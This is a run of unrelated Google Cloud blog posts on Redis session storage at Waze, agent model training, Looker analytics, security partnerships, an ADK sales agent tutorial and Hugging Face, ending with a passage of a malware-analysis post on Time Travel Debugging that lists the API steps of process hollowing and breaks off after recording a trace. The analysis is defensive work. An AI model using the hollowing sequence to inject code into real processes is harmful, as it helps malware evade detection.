Behind the scenes, user sessions are large, complex objects that update frequently and contribute to an extremely high volume of read and write operations. Session data was once locked in a monolithic service, tightly coupled to a single backend instance. That made it hard to scale and blocked other microservices from accessing the real-time session state. To modernize, we needed a shared, low-latency solution that could handle these sessions in real time and at global scale. Memorystore for Redis Cluster made that possible.
Choosing the right route
As we planned the move to a microservices-based backend, we evaluated our options, including Redis Enterprise Cloud, a self-managed Redis cluster, or continuing with our existing Memcached via Memorystore deployment. In the legacy setup, Memcached stored session data behind the monolithic Realtime (RT) server, but it lacked the replication, advanced data types, and partial update capabilities we wanted. We knew Redis had the right capabilities, but managing it ourselves or through a third-party provider would add operational overhead.
Memorystore for Redis Cluster offered the best of both worlds. It’s a fully managed service from Google Cloud with the performance, scalability, and resilience to meet Waze’s real-time demands. It delivers a 99.99% SLA and a clustered architecture for horizontal scaling. With the database decision made, we planned a careful migration from Memcached to Memorystore for Redis using a dual-write approach. For a period, both systems were updated in parallel until data parity was confirmed. Then we cut over to Redis with zero downtime.
Waze’s new data engine
From there, we built a centralized Session Server – our new command center for active user sessions – as a wrapper around Memorystore for Redis Cluster. This service became the single source of truth for all active user sessions, replacing the tight coupling between session data and the monolithic RT server. The Session Server exposes simple gRPC APIs, allowing any backend microservice to read from or write to the session state directly, including RT during the migration. This eliminated the need for client affinity, freed us from routing all session traffic through a single service, and made session data accessible across the platform.
We designed the system for resilience and scale from the ground up. Redis clustering and sharding remove single points of contention, letting us scale horizontally as demand grows. Built-in replication and automatic failover are designed to keep sessions online; even when node replacements briefly increase failure rates and latency, the navigation experience quickly stabilizes. And with support for direct gRPC calls from the mobile client to any backend service, we can use more flexible design patterns while shaving precious milliseconds off the real-time path.
Fewer pit stops, faster rides
Moving from Memcached’s 99.9% SLA to Memorystore for Redis Cluster’s 99.99% means higher availability and resiliency from the service. Load testing proved the new architecture can sustain full production traffic, comfortably handling bursts of up to 1 million MGET commands per second with a stable sub-millisecond service latency.
Because Memorystore for Redis supports partial updates, we can change individual fields within a session object rather than rewriting the entire record. That reduces network traffic, speeds up write performance, and makes the system more efficient overall – especially important when sessions can grow to many megabytes in size. These efficiencies translate directly into giving our engineering teams more time to focus on application-level performance and new feature development.
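As a simplified illustration of a partial update with the redis-py client: the key and field names are invented, Waze’s actual session schema and gRPC Session Server layer are not shown, and a real deployment would connect to the Memorystore for Redis Cluster endpoint in cluster mode rather than a localhost instance.

```python
import redis

r = redis.Redis(host="localhost", port=6379, decode_responses=True)

session_key = "session:user:12345"

# Initial write: store the session as a hash so fields can be updated independently.
r.hset(session_key, mapping={
    "active_route": "route-abc",
    "last_lat": "37.42",
    "last_lng": "-122.08",
})

# Partial update: only the changed fields are rewritten, not the whole
# (potentially multi-megabyte) session object.
r.hset(session_key, mapping={"last_lat": "37.43", "last_lng": "-122.09"})

# Readers fetch just the fields they need.
lat, lng = r.hmget(session_key, "last_lat", "last_lng")
print(lat, lng)
```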
Session data in Memorystore for Redis Cluster is now integral to Waze’s core features, from evaluating configurations to triggering real-time updates for drivers. It supports today’s demands and is built to handle what’s ahead.
The road ahead
By proving Memorystore for Redis Cluster in one of Waze’s most critical paths, we’ve built the confidence to use it in other high-throughput caching scenarios across the platform. The centralized Session Server and clustered Redis architecture are now standard building blocks in our backend, which we can apply to new services without starting from scratch.
With that initial critical path complete, our next major focus is the migration of all remaining legacy session management from our RT server. This work will ultimately give every microservice independent access to update session data. Looking ahead, we’re also focused on scaling Memorystore for Redis Cluster to meet future user growth and fine-tuning it for both cost and performance.
Learn more
Waze’s story showcases the power and flexibility of Memorystore for Redis Cluster, a fully managed service with 99.99% availability for high-scale, real-time workloads.
Learn more about the power of Memorystore and get started for free.
Welcome back to The Agent Factory! In this episode, we’re joined by Ravin Kumar, a Research Engineer at DeepMind, to tackle one of the biggest topics in AI right now: building and training open-source agentic models. We wanted to go beyond just using agents and understand what it takes to build the entire factory line—from gathering data and supervised fine-tuning to reinforcement learning and evaluations.
This post guides you through the key ideas from our conversation. Use it to quickly recap topics or dive deeper into specific segments with links and timestamps.
Before diving into the deep research, we looked at the latest developments in the fast-moving world of AI agents.
Gemini 2.5 Computer Use: Google’s new model can act as a virtual user, interacting with computer screens, clicking buttons, typing in forms, and scrolling. It’s a shift from agents that just know things to agents that can do tasks directly in a browser.
Vibe Coding in AI Studio: A new approach to app building where you describe the “vibe” of the application you want, and the AI handles the boilerplate. It includes an Annotation Mode to refine specific UI elements with simple instructions like “Change this to green.”
DeepSeek-OCR and Context Compression: DeepSeek introduced a method that treats documents like images to understand layout, compressing 10-20 text tokens into a single visual token. This drastically improves speed and reduces cost for long-context tasks.
Google Veo 3.1 and Flow: The new update to the AI video model adds rich audio generation and powerful editing features. You can now use “Insert” to add characters or “Remove” to erase objects from existing video footage, giving creators iterative control.
Ravin Kumar on Building Open Models
We sat down with Ravin to break down the end-to-end process of creating an open model with agent capabilities. It turns out the process mirrors a traditional ML lifecycle but with significantly more complex components.
Ravin explained that training data for agents looks vastly different from standard text datasets. It starts with identifying what users actually need. The data itself is a collection of trajectories, complex examples of the model making decisions and using tools. Ravin noted that they use a mix of human-curated data and synthetic data generated by their own internal “teacher” models and APIs to create a playground for the open models to learn in.
Training Techniques: SFT and Reinforcement Learning
Once the data is ready, the training process involves a two-phase approach. First comes Supervised Fine-Tuning (SFT), where frameworks update the model’s weights to nudge it into new behaviors based on the examples. However, to handle generalization — new situations not in the original training data — they rely on Reinforcement Learning (RL). Ravin highlighted the difficulty of setting rewards in RL, warning that models are prone to “reward hacking,” where they might collect intermediate rewards without ever completing the final task.
Ravin emphasized that evaluation is the most critical and high-stakes part of the process. You can’t just trust the training process; you need a rigorous “final exam.” They use a combination of broad public benchmarks to measure general capability and specific, custom evaluations to ensure the model is safe and effective for its intended use case.
Conclusion
This conversation with Ravin Kumar really illuminated that building open agentic models is a highly structured, rigorous process. It requires creating high-quality trajectories for data, a careful combination of supervised and reinforcement learning, and, crucially, intense evaluation.
Your turn to build
As Ravin advised, the best place to start is at the end. Before you write a single line of training code, define what success looks like by building a small, 50-example final exam for your agent. If you can’t measure it, you can’t improve it. We also encourage you to try mixing different approaches; for example, using a powerful API model like Gemini as a router and a specialized open-source model for specific tasks.
Check out the full episode for more details, and catch us next time!
In a world of increasing data volume and demand, businesses are looking to make faster decisions and separate insight from noise. Today, we’re bringing Conversational Analytics to general availability in Looker, delivering natural language queries to everyone in your organization, removing BI bottlenecks. With Conversational Analytics, we’re transforming the way you get answers, cutting through stale dashboards and accelerating data discovery. Our goal: make analytics and AI as easy and scalable as performing a Google search, extending BI to the broader enterprise as you go from prompt to full data exploration in seconds.
Instant AI-powered insights with Conversational Analytics in Looker
Now, with Conversational Analytics, getting an answer from your data is as simple as chatting with your most knowledgeable colleague. By tapping into human conversation, Conversational Analytics relieves you from struggling with complex dashboard filters, obscure field names, or the need to write custom SQL.
“At YouTube, we’re focused on helping creators succeed and bring their creativity to the world. We’ve been testing Conversational Analytics in Looker to give our partner managers instant, actionable data that lets them quickly guide creators and optimize creator support.” – Thomas Seyller, Senior Director, Technology & Insights, YouTube Business
The general availability of Conversational Analytics combines the reasoning power of Gemini, new capabilities in Google’s agentic frameworks, and the trusted data modeling of the Looker platform. Together, these set the stage for the next chapter in self-service analytics, making reliable data insights accessible to the entire enterprise. Conversational Analytics agents can understand your questions and provide insightful answers to questions about your data.
New at general availability is the ability to analyze data across domains. You can ask questions that integrate insights from up to five distinct Looker Explores (pre-joined views), spanning multiple business areas. Additionally, you can share the agents you build with colleagues, giving them faster access to a single source of truth, speeding consensus, and driving uniform decisions.
You can build and share agents with colleagues to have a consistent data picture.
Built on a trusted, governed foundation
The power of Conversational Analytics isn’t just in the conversation it enables; it’s in the trust of the underlying data. Conversational Analytics is grounded in Looker’s semantic layer, which ensures that every metric, field, and calculation is centrally defined and consistent, acting as a crucial context engine for AI. As more of your colleagues rapidly use these expanded capabilities, you need to know the results they see and act on are accurate.
For analysts looking to explore data, or everyday users receiving insights in the context of their business, Conversational Analytics also improves data self-service, minimizing the technical friction that can create bottlenecks and leave insights locked away.
You can now:
Ask anything, anytime: Get instant answers to simple questions like “Show me our website traffic last month for shoe sales,” leading to deeper questions and greater insights across business areas and domains.
Deepen the discovery: Move beyond the constraints of static dashboards and ask open-ended questions like, “Show me the trend of website traffic over the past six months and filter it by the California region.” The system intelligently generates the appropriate query and visualization instantly.
Extend enterprise BI: Connect your Looker models to your enterprise BI ecosystem, centralize and share agents, and create new dashboards, starting with a prompt. Built on top of Looker Explores, Conversational Analytics’ natural language interface uses LookML for fine-tuning and output accuracy.
Pivot quickly: The conversational interface supports multi-turn questions, so you can iterate on your findings. Ask for total sales, then follow up with, “Now show me that as an area chart, broken down by payment method.”
Gain full transparency: To build confidence and data literacy, the “How was this calculated?” feature provides a clear, natural language explanation of the underlying query that generated the results, so that you understand the source of your findings.
Empower the BI analyst and business user
Conversational Analytics is democratizing data for business teams, helping them govern the business’s data. At the same time, it’s also enhancing productivity and influence for data analysts and developers.
When business users can self-serve trusted data insights, data analysts see fewer interruptions and “ad-hoc” ticket requests, and can instead focus on high-impact work. Analysts can customize their client teams’ BI experiences by building Conversational Analytics agents that define common questions, filters, and style guidelines, so different teams can act on the same data in different ways.
Get ready to start talking
Conversational Analytics is available now for all Looker platform users. Your admin can enable it in your Looker instance today and you will discover how easy it is to move from simply asking “What?” to confidently determining “What’s next?” For more information, review the product documentation or watch this video tutorial.
At Google Cloud, we believe that being at the forefront of driving secure innovation and meeting the evolving needs of customers includes working with partners. The reality is that the security landscape should be interoperable, and your security tools should be able to integrate with each other.
Google Unified Security, our AI-powered, converged security solution, has been designed to support greater customer choice. To further this vision, today we’re announcing Google Unified Security Recommended, a new program that expands strategic partnerships with market-leading security solutions trusted by our customers.
We welcome CrowdStrike, Fortinet, and Wiz as inaugural Google Unified Security Recommended partners. These integrations are designed to meet our customers where they are today and ensure their end-to-end deployments are built to scale with Google in the future.
Google Unified Security and our Recommended program partner solutions.
Building confidence through validated integrations
As part of the Google Unified Security Recommended program, partners agree to adhere to comprehensive technical integration across Google’s security product portfolio, to a collaborative, customer-first support model that reflects our intent to collectively protect our customers, and to invest jointly in AI innovation. This program offers our customers:
Enhanced confidence: Select partner products that have undergone evaluation and validation to ensure optimal integration with Google Unified Security.
Accelerated discovery: Streamline your evaluation process with a carefully curated selection of market-leading solutions addressing specific enterprise challenges.
Prioritized outcomes: Minimize integration overhead, allowing your team to allocate resources towards building security solutions that deliver business outcomes.
We’re working to ensure that customers can use solutions that are powerful today — and designed for future advancements. Learn more about the product-level requirements that define the Google Unified Security Recommended designation here.
Our inaugural partners: Unifying your defenses
Our collaborations with CrowdStrike, Fortinet and Wiz exemplify our “better together” philosophy by addressing tangible security challenges.
CrowdStrike Falcon (endpoint protection): Integrations between the AI-native CrowdStrike Falcon® platform, Google Security Operations, Google Threat Intelligence, and Mandiant Threat Defense can enable customers to detect, investigate, and respond to threats faster across hybrid and multicloud environments.
Customers can use Falcon Endpoint risk signals to define Context-Aware access policies enforced by Google Chrome Enterprise. The collaboration also supports integrations that secure the AI lifecycle — and extends through the model context protocol (MCP) to advance AI for security operations. Together, CrowdStrike and Google Cloud deliver unified protection across endpoint, identity, cloud, and data.
“CrowdStrike and Google Cloud share a vision for an open, AI-powered future of security. Together, we’re uniting our leading AI-native platforms – Google Security Operations and the CrowdStrike Falcon® platform – to help customers harness the power of generative AI and stay ahead of modern threats,” said Daniel Bernard, chief business officer, CrowdStrike.
Fortinet cloud-delivered SASE and Next-Generation Firewall (network protection): Integrating Fortinet’s Security Fabric with Google Security Operations combines AI-driven FortiGuard Threat Intelligence with rich network and web telemetry to deliver unified visibility and control across users, applications, and network edges.
Customers can integrate FortiSASE and FortiGate solutions into Google Security Operations to correlate activity across their environments, apply advanced detections, and automate coordinated response actions that contain threats in near real-time. This collaboration can help reduce complexity, streamline operations, and strengthen protection across hybrid infrastructures.
“Customers are demanding simplified security architectures that reduce complexity and strengthen protection,” said Nirav Shah, senior vice president, Product and Solutions, Fortinet. “As an inaugural partner in the Google Cloud Unified Security Recommended program, we are combining the power of FortiSASE and the Fortinet Security Fabric with Google Cloud’s security capabilities to converge networking and security across environments. This approach gives SecOps and NetOps shared visibility and coordinated controls, helping teams eliminate tool sprawl, streamline operations, and accelerate secure digital transformation.”
Wiz (multicloud CNAPP): Customers can integrate Wiz’s cloud security findings with Google Security Operations to help teams identify, prioritize, and address their most critical cloud risks in a unified platform.
In addition, Wiz and Security Command Center integrate to provide complete visibility and security for Google Cloud environments, including threat detection, AI security, and in-console security for application owners. Wiz is actively developing a new Google Threat Intelligence (GTI) integration that allows existing GTI customers to access threat intelligence seamlessly in the Wiz console, enabling threat intelligence-driven detection and response processes.
“Achieving secure innovation in the cloud requires unified visibility and radical risk prioritization. Our inclusion in the Google Unified Security Recommended program recognizes the power of Wiz to deliver code-to-cloud security for Google Cloud customers. By integrating our platform with Google Security Operations and Security Command Center, we enable customers to see their multicloud attack surface, prioritize the most critical risks, and automatically accelerate remediation. Together, we are simplifying the most complex cloud security challenges and making it easier for you to innovate securely,” said Anthony Belfiore, chief strategy officer, Wiz.
Powering the agentic SOC with MCP
A critical aspect of Google Unified Security Recommended is our shared dedication to strategic AI initiatives, including MCP support. Because it enables AI models to interact with and use security tools, MCP can enhance security workflows by ensuring Gemini models possess contextual awareness across multiple downstream services.
MCP can help facilitate an enhanced, cross-platform agentic experience. With MCP, our new AI agents — such as the alert triage agent in Google Security Operations that autonomously investigates alerts — can query partner tools for telemetry, enrich investigations with third-party data, and orchestrate response actions across your entire security stack.
We are proud to confirm that all of our inaugural launch partners support MCP and have developed recommended approaches for activating MCP-supported agentic workflows across our products. This is a crucial step towards realizing our vision of an agentic SOC, where AI functions as a virtual security assistant, proactively identifying threats and guiding you to faster, more effective responses.
Our open future on Google Cloud Marketplace
The introduction of the Google Unified Security Recommended program is only the beginning. We are dedicated to expanding this program to include a wider array of our most trusted partner solutions with substantial investment across the Google Unified Security product suite, helping our customers build a more scalable, effective, and interoperable security architecture.
For simplified procurement and deployment, all qualified Google Unified Security Recommended solutions are available in the Google Cloud Marketplace. We offer Google Unified Security and Google Cloud customers streamlined purchasing of third-party offerings, all consolidated into one Google Cloud bill.
To learn more about the program and explore Google-validated solutions from our partners, visit the Google Unified Security Recommended page. Tech partners interested in program consideration are encouraged to reach out for guidance.
AI agents are transforming the nature of work by automating complex workflows with speed, scale, and accuracy. At the same time, startups are constantly moving, growing, and evolving – which means they need clear ways to implement agentic workflows, not piles of documentation that send precious resources into a tailspin.
Today, we’ll share a simple four-step framework to help startups build multi-agent systems. Multi-agentic workflows can be complicated, but there are easy ways to get started and see real gains without spending weeks in production.
In this post, we’ll show you a systematic, operations-driven roadmap for navigating this new landscape, using one of our projects to provide concrete examples for the concepts laid out in the official startups technical guide: AI agents.
Step #1: Build your foundation
The startups technical guide outlines three primary paths for leveraging agents:
Pre-built Google agents
Partner agents
Custom-built agents (agents you build on your own).
To build our Sales Intelligence Agent, we needed to automate a highly specific, multi-step workflow that involved our own proprietary logic and would eventually connect to our own data sources. This required comprehensive orchestration control and tool definition that only a “code-first” approach could provide.
That’s why we chose Google’s Agent Development Kit (ADK) as our framework. It offered the balance of power and flexibility necessary to build a truly custom, defensible system, combined with high-level abstractions for agent composition and orchestration that accelerated our development.
Step #2: Build out the engine
We took a hybrid approach when building our agent architecture, which is managed by a top-level root_agent in orchestrator.py. Its primary role is to act as an intelligent controller, using an LLM Agent for flexible user interaction while delegating the core processing loop to more deterministic ADK components like LoopAgent and custom BaseAgent classes.
Conversational onboarding: The LLM Agent starts by acting as a conversational “front-door,” interacting with the user to collect their name and email.
Workflow delegation: Once it has the user’s information, it delegates the main workflow to a powerful LoopAgent defined in its sub_agents list.
Data loading: The first step inside the LoopAgent is a custom agent called the CompanyLoopController. On the very first iteration of the loop, its job is to call our crm_tool to fetch the list of companies from the Google Sheet and load them into the session state.
Tool-based execution in a loop: The loop processes each company by calling two key tools: the research_pipeline tool that encapsulates our complex company_researcher_agent and the sales_briefing_agent tool that encapsulates the sales_briefing_agent. This “Agent-as-a-Tool” pattern is crucial for state isolation (more in Step 3).
This hybrid pattern gives us the best of both worlds: the flexibility of an LLM for user interaction and the structured, reliable control of a workflow agent with isolated, tool-based execution.
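To make the structure concrete, here is a minimal, hypothetical sketch of this hybrid layout using the google-adk Python package. The model name, instructions, and placeholder sub-agents are illustrative assumptions, not the production orchestrator.py.

# Hypothetical sketch of the hybrid orchestrator pattern described above.
from google.adk.agents import LlmAgent, LoopAgent

# Placeholder sub-agents; the real project wires in the loop controller,
# crm_tool, the research pipeline, and the briefing agent here.
research_step = LlmAgent(
    name="research_step",
    model="gemini-2.0-flash",  # assumed model choice
    instruction="Research the current company in session state and store a report.",
)
briefing_step = LlmAgent(
    name="briefing_step",
    model="gemini-2.0-flash",
    instruction="Draft a sales briefing from the research report in session state.",
)

# Deterministic workflow agent that repeats the processing steps per company.
company_loop = LoopAgent(
    name="company_loop",
    sub_agents=[research_step, briefing_step],
    max_iterations=25,  # safety bound; a real controller stops when the company list is exhausted
)

# Conversational front door: collects name and email, then delegates to the loop.
root_agent = LlmAgent(
    name="root_agent",
    model="gemini-2.0-flash",
    instruction=(
        "Greet the user and collect their name and email. "
        "Once collected, delegate the main workflow to company_loop."
    ),
    sub_agents=[company_loop],
)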
Step #3: Tools, state, and reliability
An agent is only as powerful as the tools it can wield. To be truly useful, our system needed to connect to live data, not just a static local file. To achieve this, we built a custom tool, crm_tool.py, to allow our agent to read its list of target companies directly from a Google Sheet.
To build our read_companies_from_sheet function, we focused on two key areas:
Secure authentication: We used a Google Cloud Service Account for authentication, a best practice for production systems. Our code includes a helper function, get_sheets_service(), that centralizes all the logic for securely loading the service account credentials and initializing the API client.
Configuration management: All configuration, including the SPREADSHEET_ID, is managed via our .env file. This decouples the tool’s logic from its configuration, making it portable and secure.
This approach transformed our agent from one that could only work with local data to one that could securely interact with a live, cloud-based source of truth.
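As an illustration of that approach, a crm_tool-style reader might look like the following sketch. It assumes the google-auth and google-api-python-client packages, and the SPREADSHEET_ID and SERVICE_ACCOUNT_FILE environment variables stand in for values loaded from the .env file; the sheet range is also illustrative.

# Hypothetical sketch of a crm_tool.py-style Google Sheets reader.
import os

from google.oauth2 import service_account
from googleapiclient.discovery import build

SCOPES = ["https://www.googleapis.com/auth/spreadsheets.readonly"]
SPREADSHEET_ID = os.environ["SPREADSHEET_ID"]            # loaded from .env in practice
SERVICE_ACCOUNT_FILE = os.environ["SERVICE_ACCOUNT_FILE"]


def get_sheets_service():
    """Centralizes credential loading and Sheets API client construction."""
    credentials = service_account.Credentials.from_service_account_file(
        SERVICE_ACCOUNT_FILE, scopes=SCOPES
    )
    return build("sheets", "v4", credentials=credentials)


def read_companies_from_sheet(sheet_range: str = "Companies!A2:A") -> list[str]:
    """Returns the list of target company names from the configured sheet."""
    service = get_sheets_service()
    result = (
        service.spreadsheets()
        .values()
        .get(spreadsheetId=SPREADSHEET_ID, range=sheet_range)
        .execute()
    )
    return [row[0] for row in result.get("values", []) if row]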
Managing state in loops: The “Agent-as-a-Tool” pattern
A critical challenge in looping workflows is ensuring state isolation between iterations. ADK’s session.state persists, which can cause ‘context rot’ if not managed. Our solution was the “Agent-as-a-Tool” pattern. Instead of running the complex company_researcher_agent directly in the loop, we encapsulated its entire SequentialAgent pipeline into a single, isolated AgentTool (company_researcher_agent_tool).
Every time the loop calls this tool, the ADK provides a clean, temporary context for its execution. All internal steps (planning, QA loop, compiling) happen within this isolated context. When the tool returns the final compiled_report, the temporary context is discarded, guaranteeing a fresh start for the next company. This pattern provides perfect state isolation by design, making the loop robust without manual cleanup logic.
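A stripped-down sketch of the pattern, again assuming the google-adk package with illustrative agent names, models, and instructions:

# Minimal sketch of the "Agent-as-a-Tool" pattern.
from google.adk.agents import LlmAgent, SequentialAgent
from google.adk.tools.agent_tool import AgentTool

planner = LlmAgent(name="planner", model="gemini-2.0-flash",
                   instruction="Plan the research steps for the given company.")
compiler = LlmAgent(name="compiler", model="gemini-2.0-flash",
                    instruction="Compile the findings into a final report.")

# The multi-step pipeline that should run with a clean context per company.
company_researcher_agent = SequentialAgent(
    name="company_researcher_agent",
    sub_agents=[planner, compiler],
)

# Wrapping the pipeline as a tool gives each invocation its own temporary
# context, so state from one loop iteration never leaks into the next.
company_researcher_agent_tool = AgentTool(agent=company_researcher_agent)

# Any calling agent can now list the wrapped pipeline in its tools.
research_step = LlmAgent(
    name="research_step",
    model="gemini-2.0-flash",
    instruction="Call the researcher tool for the current company.",
    tools=[company_researcher_agent_tool],
)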
Step #4: Go from localhost to a scalable deployed product
Here is our recommended three-step blueprint for moving from a local prototype to a production-ready agent on Google Cloud.
1. Adopt a production-grade project template
Our most critical lesson was that a simple, local-first project structure is not built for the rigors of the cloud. The turning point for our team was adopting Google’s official Agent Starter Pack. This professional template is not just a suggestion; for any serious project, we now consider it a requirement. It provides three non-negotiable foundations for success out of the box:
Robust dependency management: It replaces the simplicity of local tools like Poetry with the production-grade power of PDM and uv, ensuring that every dependency is locked and every deployment is built from a fast, deterministic, and repeatable environment.
A pre-configured CI/CD pipeline: It comes with a ready-to-use continuous integration and deployment pipeline for Google Cloud Build, which automates the entire process of testing, building, and deploying your agent.
Multi-environment support: The template is pre-configured for separate staging and production environments, a best practice that allows you to safely test changes in an isolated staging environment before promoting them to your live users.
The process begins by using the official command-line tool to generate your project’s local file structure. This prompts you to choose a base template; we used the “ADK Base Template” and then moved our agent logic into the newly created source code files in the app directory.
# Ensure pipx is installed
pip install --user pipx

# Run the project generator to create the local file structure
pipx run agent-starter-pack create your-new-agent-project
The final professional project structure:
final-agent-project/
├── .github/                 # Contains the automated CI/CD workflow configuration
│   └── workflows/
├── app/                     # Core application source code for the agent
│   ├── __init__.py
│   ├── agent_engine_app.py
│   ├── orchestrator.py      # The main agent that directs the workflow
│   ├── company_researcher/  # Sub-agent for performing research
│   ├── briefing_agent/      # Sub-agent for drafting emails
│   └── tools/               # Custom tools the agents can use
├── tests/                   # Automated tests for your agent
├── .env                     # Local environment variables (excluded from git)
├── pyproject.toml           # Project definition and dependencies
└── uv.lock                  # Locked dependency versions for speed and consistency
With the local files created, the next step is to provision the cloud infrastructure. From inside the new project directory, you run the setup-cicd command. This interactive wizard connects to your Google Cloud and GitHub accounts, then uses Terraform under the hood to automatically build your entire cloud environment, including the CI/CD pipeline.
# Navigate into your new project directory
cd your-new-agent-project

# Run the interactive CI/CD setup wizard
pipx run agent-starter-pack setup-cicd
2. Cloud Build
Once the setup is complete with the starter pack, your development workflow becomes incredibly simple. Every time a developer pushes a new commit to the main branch of your GitHub repository:
Google Cloud Build fetches your latest code.
It builds your agent into a secure, portable container image. This process includes installing all the dependencies from your uv.lock file, guaranteeing a perfect, repeatable build every single time.
It deploys this new version to your staging environment. Within minutes, your latest code is live and ready for testing in a real cloud environment.
It waits for your approval. The pipeline is configured to require a manual “Approve” click in the Cloud Build console before it will deploy that exact same, tested version to your production environment. This gives you the perfect balance of automation and control.
3. Deploy on Agent Engine and Cloud Run
The final piece of the puzzle is where the agent actually runs. Cloud Build deploys your agent to Vertex AI Agent Engine, which provides the secure, public endpoint and management layer for your agent.
Crucially, Agent Engine is built on top of Google Cloud Run, a powerful serverless platform. This means you don’t have to manage any servers yourself. Your agent automatically scales up to handle thousands of users, and scales down to zero when not in use, meaning you only pay for the compute you actually consume.
Get started
Ready to build your own?
Explore the code for our Sales Intelligence Agent on GitHub.
The technical journey and insights detailed in this blog post were the result of a true team effort. I want to extend my sincere appreciation to the core collaborators whose work provided the foundation for this article: Luis Sala, Isaac Attuah, Ishana Shinde, Andrew Thankson, and Kristin Kim. Their hands-on contributions to architecting and building the agent were essential to the lessons shared here.
For those building with AI, most are in it to change the world — not twiddle their thumbs. So when inspiration strikes, the last thing anyone wants is to spend hours waiting for the latest AI models to download to their development environment.
That’s why today we’re announcing a deeper partnership between Hugging Face and Google Cloud that:
reduces Hugging Face model download times through Vertex AI and Google Kubernetes Engine
offers native support for TPUs on all open models sourced through Hugging Face
provides a safer experience through Google Cloud’s built-in security capabilities.
We’ll enable faster download times through a new gateway for Hugging Face repositories that will cache Hugging Face models and datasets directly on Google Cloud. Moving forward, developers working with Hugging Face’s open models on Google Cloud should expect download times to take minutes, not hours.
We’re also working with Hugging Face to add native support for TPUs for all open models on the Hugging Face platform. This means that whether developers choose to deploy training and inference workloads on NVIDIA GPUs or on TPUs, they’ll experience the same ease of deployment and support.
Open models are gaining traction with enterprise developers, who typically work with specific security requirements. To support enterprise developers, we’re working with Hugging Face to bring Google Cloud’s extensive security protocols to all Hugging Face models deployed through Vertex AI. This means that any Hugging Face model on Vertex AI Model Garden will now be scanned and validated with Google Cloud’s leading cybersecurity capabilities powered by our Threat Intelligence platform and Mandiant.
This expanded partnership with Hugging Face furthers that commitment and will ensure that developers have an optimal experience when serving AI models on Google Cloud, whether they choose a model from Google, from our many partners, or one of the thousands of open models available on Hugging Face.
The prevalence of obfuscation and multi-stage layering in today’s malware often forces analysts into tedious and manual debugging sessions. For instance, the primary challenge of analyzing pervasive commodity stealers like AgentTesla isn’t identifying the malware, but quickly cutting through the obfuscated delivery chain to get to the final payload.
Unlike traditional live debugging, Time Travel Debugging (TTD) captures a deterministic, shareable record of a program’s execution. Leveraging TTD’s powerful data model and time travel capabilities allows us to efficiently pivot to the key execution events that lead to the final payload.
This post introduces all of the basics of WinDbg and TTD necessary to start incorporating TTD into your analysis. We demonstrate why it deserves to be a part of your toolkit by walking through an obfuscated multi-stage .NET dropper that performs process hollowing.
What is Time Travel Debugging?
Time Travel Debugging (TTD), a technology offered by Microsoft as part of WinDbg, records a process’s execution into a trace file that can be replayed forwards and backwards. The ability to quickly rewind and replay execution reduces analysis time by eliminating the need to constantly restart debugging sessions or restore virtual machine snapshots. TTD also enables users to query the recorded execution data and filter it with Language Integrated Query (LINQ) to find specific events of interest like module loads or calls to APIs that implement malware functionalities like shellcode execution or process injection.
During recording, TTD acts as a transparent layer that allows full interaction with the operating system. A trace file preserves a complete execution record that can be shared with colleagues to facilitate collaboration, circumventing environmental differences that can affect the results of live debugging.
While TTD offers significant advantages, users should be aware of certain limitations. Currently, TTD is restricted to user-mode processes and cannot be used for kernel-mode debugging. The trace files generated by TTD have a proprietary format, meaning their analysis is largely tied to WinDbg. Finally, TTD does not offer “true” time travel in the sense of altering the program’s past execution flow; if you wish to change a condition or variable and see a different outcome, you must capture an entirely new trace as the existing trace is a fixed recording of what occurred.
A Multi-Stage .NET Dropper with Signs of Process Hollowing
The Microsoft .NET framework has long been popular among threat actors for developing highly obfuscated malware. These programs often use code flattening, encryption, and multi-stage assemblies to complicate the analysis process. This complexity is amplified by Platform Invoke (P/Invoke), which gives managed .NET code direct access to the unmanaged Windows API, allowing authors to port tried-and-true evasion techniques like process hollowing into their code.
Process hollowing is a pervasive and effective form of code injection where malicious code runs under the guise of another process. It is common at the end of downloader chains because the technique allows injected code to assume the legitimacy of a benign process, making it difficult to spot the malware with basic monitoring tools.
In this case study, we’ll use TTD to analyze a .NET dropper that executes its final stage via process hollowing. The case study demonstrates how TTD facilitates highly efficient analysis by quickly surfacing the relevant Windows API functions, enabling us to bypass the numerous layers of .NET obfuscation and pinpoint the payload.
Basic analysis is a vital first step that can often identify potential process hollowing activity. For instance, using a sandbox may reveal suspicious process launches. Malware authors frequently target legitimate .NET binaries for hollowing as these blend seamlessly with normal system operations. In this case, reviewing process activity on VirusTotal shows that the sample launches InstallUtil.exe (found in %windir%\Microsoft.NET\Framework\<version>). While InstallUtil.exe is a legitimate utility, its execution as a child process of a suspected malicious sample is an indicator that helps focus our initial investigation on potential process injection.
Figure 1: Process activity recorded in the VirusTotal sandbox
Despite newer, stealthier techniques such as Process Doppelgänging, when an attacker employs process injection it is still often the classic version of process hollowing, thanks to its reliability, relative simplicity, and the fact that it still effectively evades less sophisticated security solutions. The classic process hollowing steps are as follows:
CreateProcess (with the CREATE_SUSPENDED flag): Launches the victim process (InstallUtil.exe) but suspends its primary thread before execution.
ZwUnmapViewOfSection or NtUnmapViewOfSection: “Hollows out” the process by removing the original, legitimate code from memory.
VirtualAllocEx and WriteProcessMemory: Allocates new memory in the remote process and injects the malicious payload.
GetThreadContext: Retrieves the context (the state and register values) of the suspended primary thread.
SetThreadContext: Redirects the execution flow by modifying the entry point register within the retrieved context to point to the address of the newly injected malicious code.
ResumeThread: Resumes the thread, causing the malicious code to execute as if it were the legitimate process.
To confirm this activity in our sample using TTD, we focus our search on the process creation and the subsequent writes to the child process’s address space. The approach demonstrated in this search can be adapted to triage other techniques by adjusting the TTD queries to search for the APIs relevant to that technique.
Recording a Time Travel Trace of the Malware
To begin using TTD, you must first record a trace of a program’s execution. There are two primary ways to record a trace: using the WinDbg UI or the command-line utilities provided by Microsoft. The command-line utilities offer the quickest and most customizable way to record a trace, and that is what we’ll explore in this post.
Warning: Take all usual precautions for performing dynamic analysis of malware when recording a TTD trace of malware executables. TTD recording is not a sandbox technology and allows the malware to interface with the host and the environment without obstruction.
TTD.exe is the preferred command-line tool for recording traces. While Windows includes a built-in utility (tttracer.exe), that version has reduced features and is primarily intended for system diagnostics, not general use or automation. Not all WinDbg installations provide the TTD.exe utility or add it to the system path. The quickest way to get TTD.exe is to use the stand-alone installer provided by Microsoft. This installer automatically adds TTD.exe to the system’s PATH environment variable, ensuring it’s available from a command prompt. To see its usage information, run TTD.exe -help.
The quickest way to record a trace is to simply provide the command line invoking the target executable with the appropriate arguments. We use the following command to record a trace of our sample:
C:\Users\FLARE\Desktop> ttd.exe 0b631f91f02ca9cffd66e7c64ee11a4b.bin
Microsoft (R) TTD 1.01.11 x64
Release: 1.11.532.0
